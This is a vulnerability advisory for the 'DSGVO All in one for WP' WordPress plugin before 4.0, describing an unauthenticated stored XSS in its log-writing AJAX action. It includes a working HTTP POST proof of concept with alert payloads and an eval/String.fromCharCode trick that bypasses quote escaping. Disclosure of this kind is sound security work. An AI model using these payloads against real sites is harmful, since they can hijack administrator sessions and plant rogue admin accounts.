DSGVO All in one for WP < 4.0 - Unauthenticated Stored Cross-Site Scripting (XSS)

Description

The dsgvoaio_write_log AJAX action of the plugin did not sanitise or escape some POST parameter submitted before outputting them in the Log page in the administrator dashboard (wp-admin/admin.php?page=dsgvoaiofree-show-log). This could allow unauthenticated attackers to gain unauthorised access by using an XSS payload to create a rogue administrator account, which will be trigged when an administrator will view the logs.

Proof of Concept

POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1

Accept: application/json, text/javascript, */*; q=0.01

Accept-Language: en-GB,en;q=0.5

Accept-Encoding: gzip, deflate

X-Requested-With: XMLHttpRequest

Connection: close

Content-Type: application/x-www-form-urlencoded

Content-Length: 180



action=dsgvoaio_write_log&id=%3cimg%20src%20onerror%3dalert(%2fXSS-Id%2f)%3e&state=true&key=wordpressmain&name=All&allvalue%5B%5D=%3cimg%20src%20onerror%3dalert(%2fXSS-value%2f)%3e





Payload will be processed by update_option(). This will lead into escaped single and double qoutes. You can use

the String.fromCharCode string construction to bypass this limitation, such as %3Cimg%20src%3D1%20style%3Ddisplay%3Anone%20onerror%3Deval(String.fromCharCode(97%2C108%2C101%2C114%2C116%2C40%2C49%2C50%2C41))%3E